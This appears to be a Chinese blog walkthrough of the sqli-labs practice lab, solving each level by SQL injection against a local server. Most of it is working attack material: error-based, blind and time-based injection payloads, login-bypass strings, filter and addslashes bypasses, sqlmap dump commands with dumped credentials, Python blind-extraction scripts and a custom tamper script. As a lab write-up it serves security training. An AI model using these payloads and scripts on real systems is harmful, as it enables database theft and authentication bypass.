sqli-labs write up

sqli-labs

[TOC]

Less-1: error based string

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 判斷字符串引號閉合

    ?id=' 報錯
?id=" 成功,且未發(fā)生變化

  3. updatexml爆庫、表、列名

    ?id=' and updatexml(0x01,concat(0x7e,database(),0x7e),0x01)%23

?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),0x7e),0x01)%23

?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),0x7e),0x01)%23

  4. 查詢user密碼

    ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%200,1),0x7e),0x01)%23

  5. SQLmap方案

    sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --dbs -p id

sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --current-db -p id

sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security --tables -p id

sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security -T users --dump -p id

Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

    Less-2: error based intiger

  6. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,無結(jié)果
?id=2-1 成功,且與id=1結(jié)果相同

  7. 輸入未閉合引號

    ?id=1' 報錯

  8. 爆庫同上Less-1

    ?id=1 and updatexml(0x01,concat(0x01,database(),0x01),0x01)

Less-3: error based string

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 輸入未閉合引號

    ?id=1' 報錯,報錯信息中發(fā)現(xiàn))

  3. 注入語句需注意閉合),爆庫同上Less-1

    ?id=1') and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23

Less-4: error based string

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 輸入未閉合引號

    ?id=1" 報錯,報錯信息中發(fā)現(xiàn))

  3. 注入語句需注意閉合),爆庫同上Less-1

    ?id=1") and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23

Less-5: double query

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 輸入未閉合引號

    ?id=1' 報錯

  3. 爆庫同上Less-1

    ?id=1%27%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23

Less-6: double query

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 輸入未閉合引號

    ?id=1" 報錯

  3. 爆庫同上Less-1

    ?id=1%22%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23

Less-7: Dump into outfile

為什么要dump into outfile,數(shù)據(jù)庫是mysql運(yùn)行的,php是www-data運(yùn)行的,dump出來也訪問不到

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 輸入未閉合引號

    ?id=1' 報錯
......
?id=1')) and 1=1 %23, 發(fā)現(xiàn)'))的閉合

  3. 采用bool方式注入

    ?id=1%27))%20and%20(select%20length(database()))%20=8%20%23

?id=1%27))%20and%20(select%20substr(database(),1,1))%20=%27s%27%20%23

?id=1%27))%20and%20(select%20length((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27)))%20=29%20%23

?id=1%27))%20and%20(select%20length((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%20%27users%27)))%20=20%20%23

?id=1%27))%20and%20(select%20length((select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%201)))%20=%2011%20%23

  4. 以上內(nèi)容僅供參考,請使用sqlmap的方式

    sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --dbs -p id --technique B

sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --current-db -p id --technique B

sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security --tables -p id --technique B

sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security -T users --dump -p id --technique B

Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

Less-8: Blind bool

  1. 判斷參數(shù)ID類型

    ?id=1 成功
?id=1-1 成功,且與id=1結(jié)果相同

  2. 輸入未閉合引號

    ?id=1" 回顯正常
?id=1' 無回顯
?id=1' and 1=1 %23 回顯正常
?id=1' and 1=2 %23 無回顯

  3. bool形注入同上Less-7

Less-9: Blind Time based

  1. 輸入各種亂七八糟的東西回顯均未改變,經(jīng)過各種嘗試發(fā)現(xiàn)時間注入及單引號閉合

    ?id=1' and (select sleep(10)) %23

  2. 直接上sqlmap,

    sqlmap -u 'http://localhost:9090/Less-9/?id=1' --batch -D security -T users --dump  -p id --technique B

  3. 實(shí)際上,有記錄和無記錄返回的html長度是不同的,可以據(jù)此進(jìn)行bool注入

Less-10: Blind Time based

  1. 此題與Less-9同,閉合引號為",使用sqlmap時需要--level 2

Less-11: Error based String

  1. 使用用戶名'報錯

  2. 使用用戶名' or 1=1 #直接登錄成功

  3. 進(jìn)行error注入爆庫

    uname=' and updatexml(1,concat(0x01,database(),0x01),1)#&passwd=&submit=Submit

  4. 使用sqlmap進(jìn)行進(jìn)一步注入

    4.1 創(chuàng)建請求文件11.post

    POST /Less-11/ HTTP/1.1
Host: localhost:9090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://localhost:9090
DNT: 1
Connection: keep-alive
Referer: http://localhost:9090/Less-11/
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=&passwd=&submit=Submit

    4.2 sqlmap注入

    sqlmap -r 11.post --batch -D security -T users --dump -p uname --technique E

Less-12 Error based string

與上題同,閉合為")

Less-13 Error based string

與上題同,閉合為')

Less-14 Error based string

與上題同,閉合為"

Less-15 Blind Bool

  1. 使用用戶名' or 1=1 #直接登錄成功

  2. 使用sqlmap掃描不能利用bool可以利用sleep

  3. 手動注入

    import string

import requests


def req(sql):
    data = {
        "uname": "' or {}#".format(sql),
        "passwd": "",
        "submit": "Submit"
    }
    res = requests.post("http://localhost:9090/Less-15/", data=data)
    return "flag.jpg" in res.text


def database():
    sql = "(length(database()) = {})"
    length = 0
    for i in range(100):
        if req(sql.format(i)):
            length = i
            break
    sql = "(substr(database(),{},1) = '{}')"
    print(length)
    database_name = ""
    for i in range(length):
        for j in range(len(string.printable)):
            if req(sql.format(i + 1, string.printable[j])):
                database_name += string.printable[j]
                break
    print(database_name)


def tables():
    sql = "(length((select group_concat(table_name) from information_schema.tables where table_schema = 'security')) = {})"
    length = 0
    for i in range(100):
        if req(sql.format(i)):
            length = i
            break
    sql = "(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'security'),{},1) = '{}')"
    print(length)
    table_names = ""
    for i in range(length):
        for j in range(len(string.printable)):
            if req(sql.format(i + 1, string.printable[j])):
                table_names += string.printable[j]
                break
    print(table_names)


def columns():
    sql = "(length((select group_concat(column_name) from information_schema.columns where table_name = 'users')) = {})"
    length = 0
    for i in range(100):
        if req(sql.format(i)):
            length = i
            break
    sql = "(substr((select group_concat(column_name) from information_schema.columns where table_name = 'users'),{},1) = '{}')"
    print(length)
    table_names = ""
    for i in range(length):
        for j in range(len(string.printable)):
            if req(sql.format(i + 1, string.printable[j])):
                table_names += string.printable[j]
                break
    print(table_names)


def dump():
    sql = "((select count(*) from users) = {})"
    count = 0
    for i in range(100):
        if req(sql.format(i)):
            count = i
            break
    print(count)
    for c in range(count):
        length = 0
        sql = "(length((select concat(id,':',username,':',password) from users limit {},1)) = {})"
        for i in range(100):
            if req(sql.format(c, i)):
                length = i
                break
        sql = "(substr((select concat(id,':',username,':',password) from users limit {},1),{},1) = '{}')"
        line = ""
        for i in range(length):
            for j in range(len(string.printable)):
                if req(sql.format(c, i + 1, string.printable[j])):
                    line += string.printable[j]
                    break
        print(line)


def main():
    # database()
    # tables()
    # columns()
    dump()


if __name__ == '__main__':
    main()

    結(jié)果不區(qū)分大小寫

Less-16 Blind Time based

  1. 使用用戶名") or 1=1 #直接登錄成功

  2. sqlmap注入

    sqlmap -r 16.post --batch -D security -T users --dump --dbms mysql -p uname

Less-17: Update Query Error based

  • 坑:需要先知道一個有效的用戶名;SQL一定要報錯,不然容易把整個庫的密碼都更新掉;

  1. 嘗試注入uname參數(shù),passwd留空,uname寫入各種奇怪SQL后均沒反應(yīng);

  2. 嘗試注入passwd參數(shù),uname留空,passwd寫入各種奇怪SQL后均沒反應(yīng);

  3. passwd保持'",嘗試爆破uname,使用Dhakkan即可看到報錯回顯;

  4. uname保持Dhakkan,對passwd進(jìn)行手工注入,這里如果使用sqlmap會把數(shù)據(jù)庫掃壞;

  5. 爆庫

    uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit

uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),0x7e),1)#&submit=Submit

uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name= 'users'),0x7e),1)#&submit=Submit

uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select concat(id,':',username,':',password) from users limit 1),0x7e),1)#&submit=Submit

Less-18: Header injection Error based

  • 坑:一定得知道一個能正確登錄的用戶

  1. 嘗試注入uname,passwd均無效;

  2. 嘗試寫入X-Forwarded-For,X-Reql-IP頭進(jìn)行注入均無效;

  3. 嘗試弱口令爆破用戶,發(fā)現(xiàn)admin:admin登錄成功,并且有UA回顯;

  4. 嘗試使用'"注入UA,發(fā)現(xiàn)單引號閉合,并且后邊有兩個列;

  5. 爆庫

    User-Agent: ',1,updatexml(1,concat(0x7e,database(),0x7e),1))#

  6. sqlmap注入

    sqlmap -r 18.post --batch -D security -T users --dump --technique E -p User-Agent

Less-19: Header injection Error based

與上題Less-17同,注入點(diǎn)在Referer

Less-20: Cookie injection Error based

與上題Less-17同,注入點(diǎn)在Cookie

Less-21: Cookie injection base64

與上題Less-20同,注入點(diǎn)Cookie的值為Base64編碼

sqlmap需要使用tamper base64encode.py

sqlmap -r 21.get --batch -D security -T users --dump  --technique E -p Cookie --tamper base64encode.py

Less-22: Cookie injection base64

與上題Less-21同,注入點(diǎn)在Cookie,閉合為雙引號

sqlmap需要使用tamper base64encode.py

sqlmap -r 21.get --batch -D security -T users --dump  --technique E -p Cookie --tamper base64encode.py

Less-23: Error Based

  1. 嘗試輸入id
?id=1 正常
?id=1-1 正常
?id=1' 報錯
?id=1' %23 報錯
?id=1' --+ 報錯
?id=1' and 1=1 and ''=' 正常
?id=1' and 1=2 and ''=' 無回顯
  1. 在中間條件的位置進(jìn)行報錯注入,略

Less-24: Secound Degree Injection

  1. 注冊正常用戶abc:abc,登錄修改密碼,登出用戶,使用新密碼登錄;
  2. 整個流程一共3個接口:注冊、登錄、修改密碼,逐個驗(yàn)證;
  3. 注冊用戶'":'"(用戶名密碼都是單引號雙引號),注冊成功;
  4. 登錄用戶'":'",登錄成功;
  5. 修改密碼未彈出成功頁面,猜測失敗,使用新密碼登錄失敗,使用原密碼登錄成功;
  6. 說明修改密碼是存在注入點(diǎn)的;
  7. 修改用戶abc的密碼為'"并重新登錄,發(fā)現(xiàn)登錄成功,證明注入點(diǎn)存在于用戶名中;
  8. 注冊用戶admin'#:123"并修改密碼為123456
  9. 登錄admin用戶密碼為123456;

Less-25 Trick with OR & AND

  1. 判斷參數(shù)id類型

    ?id=1 正常
?id=1'" 報錯

  2. 嘗試報錯注入

    ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23

    發(fā)現(xiàn)and被刪掉,雙寫and再次嘗試

    ?id=1' anandd updatexml(1,concat(0x7e,database(),0x7e),1)%23

    成功爆出庫名

  3. 寫一個簡單的sqlmap tamper 處理雙寫過濾

    #!/usr/bin/env python

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """ 
    Replaces and to anandd , or to oorr
    """
    payload = payload.replace("and","anandd")
    payload = payload.replace("AND","ANANDD")
    payload = payload.replace("or","oorr")
    payload = payload.replace("OR","OORR")

    return payload

    sqlmap -u "http://localhost:9090/Less-25/?id=1" --batch --dbms mysql --technique E -p id --tamper doubleword.py -D security -T users --dump

Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

Less-26: Trick with comment

  1. 判斷注入類型

    ?id=1'" 單引號閉合
?id=1' or 1=1 # 空格注釋均被過濾
?id=1'||1=1||''=' 成功

  2. 爆庫表列

    http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,database(),0x7e),1)||%27%27=%27

http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`=%27security%27),0x7e),1)||%27%27=%27

http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_name`=%27users%27),0x7e),1)||%27%27=%27

http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(concat(id,':',username,':',passwoorrd))from(users)where`id`=%271%27),0x7e),1)||%27%27=%27

Less-26a: Trick with comment

  1. 測試注入類型

    ?id=1 成功
?id='" 失敗
?id='||''=' 
?id='||'1'=' 失敗
?id='||1=1||'1'=' 成功
?id='||1=2||'1'=' 失敗,blind bool

  2. 嘗試爆破

    http://localhost:9090/Less-26a/?id=%27||(select(length(database())))=8||%271%27=%27

http://localhost:9090/Less-26a/?id=%27||(select(substr(database(),1,1)))='s'||%271%27=%27

略

Less-27: Trick with select & union

與Less-26同,select被過濾,用SeLect代替

Less-27a: Trick with select & union

與上兩題同,雙引號閉合,SeLect,blind bool

http://localhost:9090/Less-27a/?id=%22||(SeLect(length(database())))=8||%221%22=%22

Less-28: Trick with select & union

與上題同,單引號閉合

Less-28a: Trick with select & union

與上題Less-27a同

Less-29: Protection with WAF

WAF似乎并沒有起到什么作用,基礎(chǔ)的error based

Less-30: Protection with WAF

WAF似乎并沒有起到什么作用,基礎(chǔ)的blind bool

Less-31: Protection with WAF

與上題Less-29同

Less-32: Bypass addslashes

%df能吃掉反斜杠

?id=%df' or 1=1 %23 成功

?id=%df' or updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=%df' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=unhex(7365637572697479)),0x7e),1)%23

?id=%df' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=unhex(7573657273)),0x7e),1)%23

?id=%df' or updatexml(1,concat(0x7e,(select concat(id,0x3a,username,0x3a,password) from users limit 0,1),0x7e),1)%23

Less-34 Bypass ADD SLASHES

Less-32的POST版

Less-35 Bypass Add SLASHES

Less-32的簡化版,不需要引號

Less-36 Bypass MySQL real escape

同Less-32

Less-37 Bypass MySQL real escape

同Less-34

Less-38 stacked Query

基礎(chǔ)的error based

Less-39 stacked Query

基礎(chǔ)的error based

Less-40 stacked Query

基礎(chǔ)的blind bool

Less-41 stacked Query

基礎(chǔ)的blind bool

Less-42 stacked Query error based

password字段存在注入,單引號閉合,error based

Less-43 stacked Query error based

password字段存在注入,單引號括號閉合,error based

Less-44 stacked Query blind

password字段存在注入,單引號括號閉合,基于response的http code是否302存在bool注入

login_user=&login_password=' or length(database()) =8#&mysubmit=Login

Less-45 stacked Query blind

與上題Less-44同,單引號括號閉合

Less-46 ORDER BY

?sort=1 || updatexml(1,concat(0x7e,database(),0x7e),1)

Less-47 ORDER BY

與上題Less-47同

Less-48 ORDRE BY Blind

?sort=if (1=1,1,(select 1 union select 2)) 有回顯
?sort=if (1=2,1,(select 1 union select 2)) 無回顯

blind bool

Less-49 ORDRE BY Blind

?sort=2' and if(1=1,1,(select 1 union select 2))%23 有回顯
?sort=2' and if(1=2,1,(select 1 union select 2))%23 無回顯

blind bool

Less-50 ORDRE BY

?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

error based

Less-51 ORDER BY

?sort=' || updatexml(1,concat(0x7e,database(),0x7e),1)%23

error based

Less-52 ORDER BY

同Less-48

Less-53 ORDER BY

同Less-49

Less-54 Challenge-1

?id=1

?id=1"

?id=1' %23

?id=1' order by 3 %23

?id=1' order by 4 %23

?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23

?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23

?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='P3KMPMWT2P' %23

?id=-1' union select id,secret_7HNV,concat(sessid,':',tryy) from challenges.P3KMPMWT2P %23

Less-55 Challenge-2

?id=1

?id=1'%23

?id=1"%23

?id=2-1

?id=-1 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1) union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1) union select 1,1,group_concat(column_name) from information_schema.columns where table_name='INEAJ9ROW1' %23

?id=-1' union select id,secret_YE4X,concat(sessid,':',tryy) from challenges.INEAJ9ROW1 %23

Less-56 Challenge-3

?id=1

?id=1'%23

?id=1"%23

?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1') union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1') union select 1,1,group_concat(column_name) from information_schema.columns where table_name='XB1AMCG87R' %23

?id=-1') union select id,secret_2YG9,concat(sessid,':',tryy) from challenges.XB1AMCG87R %23

Less-57 Challenge-4

?id=1

?id=1'%23

?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1" union select 1,1,group_concat(column_name) from information_schema.columns where table_name='ZLFUJA075M' %23

?id=-1" union select id,secret_PXK5,concat(sessid,':',tryy) from challenges.ZLFUJA075M %23

Less-58 Challenge-5

?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='W7PLNH9DHZ'),0x7e),1) %23

?id=-1' and updatexml(1,concat(0x7e,(select secret_O572 from challenges.W7PLNH9DHZ),0x7e),1) %23

Less-59 Challenge-6

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id='"

?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MJ77P2XKIV'),0x7e),1) %23

?id=-1 and updatexml(1,concat(0x7e,(select secret_C8VM from challenges.MJ77P2XKIV),0x7e),1) %23

Less-60 Challenge-7

?id='"

?id=-1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='V97YZ9KR3X'),0x7e),1) %23

?id=-1") and updatexml(1,concat(0x7e,(select secret_80IV from challenges.V97YZ9KR3X),0x7e),1) %23

Less-61 Challenge-8

?id='"

?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='FJIXLCJP1F'),0x7e),1) %23

?id=-1')) and updatexml(1,concat(0x7e,(select secret_4MGK from challenges.FJIXLCJP1F),0x7e),1) %23

Less-62 Challenge-9

?id=1
?id=1 and 1=2 %23
?id=1' and 1=2 %23
?id=1') and 1=2 %23
?id=1') and 1=1 %23 確定blind bool及閉合

# 83個請求
from urllib.parse import quote

import requests
from lxml import etree

url = "http://localhost:9090/Less-62/?id={}"
headers = {
    "Host": "localhost:9090",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "DNT": "1",
    "Connection": "keep-alive",
    "Cookie": "challenge=2b720b5359202de2d62768369718f694",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}

names = []


def req(sql):
    p = quote("-1') or id = ({}) #".format(sql))
    u = url.format(p)
    print(u)
    res = requests.post(u, headers=headers)
    html = etree.HTML(res.text)
    txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
    if len(txt) != 0:
        name = str(txt[0]).replace("Your Login name :", "")
        return names.index(name) + 1
    return -1


def find_names():
    for i in range(1, 15):
        res = requests.get(url.format(i), headers=headers)
        html = etree.HTML(res.text)
        txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
        print(txt)
        if len(txt) != 0:
            names.append(str(txt[0]).replace("Your Login name :", ""))
        else:
            break
    print(names)


def find_number(m1, m2):
    for i in range(11):
        n1 = 10 * i + m1
        for j in range(10):
            n2 = 11 * j + m2
            if n1 == n2:
                return n2


def tables():
    table_name = ""
    sql1 = "select mod(n,10)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
           "information_schema.tables where table_schema='challenges')t"
    sql2 = "select mod(n,11)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
           "information_schema.tables where table_schema='challenges')t"

    for i in range(1, 100):
        m1 = req(sql1.format(i))
        if m1 == -1:
            break
        m2 = req(sql2.format(i))
        if m2 == -1:
            break
        asc = find_number(m1 - 1, m2 - 1) + 47
        table_name += chr(asc)
    return table_name


def dump(table_name):
    value = ""
    sql1 = "select mod(n,10)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
           "4 as d union select * from challenges.{} limit 1,1)t)tt"
    sql2 = "select mod(n,11)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
           "4 as d union select * from challenges.{} limit 1,1)t)tt"

    for i in range(1, 100):
        m1 = req(sql1.format(i, table_name))
        if m1 == -1:
            break
        m2 = req(sql2.format(i, table_name))
        if m2 == -1:
            break
        asc = find_number(m1 - 1, m2 - 1) + 47
        value += chr(asc)
    return value


def main():
    find_names()
    table_name = tables()
    value = dump(table_name)
    print(value)


if __name__ == '__main__':
    main()

Less-63 Challenge-10

與上題Less-62同,閉合為單引號'

Less-64 Challenge-11

與上題Less-62同,閉合為雙括號))

Less-65 Challenge-12

與上題Less-62同,閉合為雙引號括號")

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容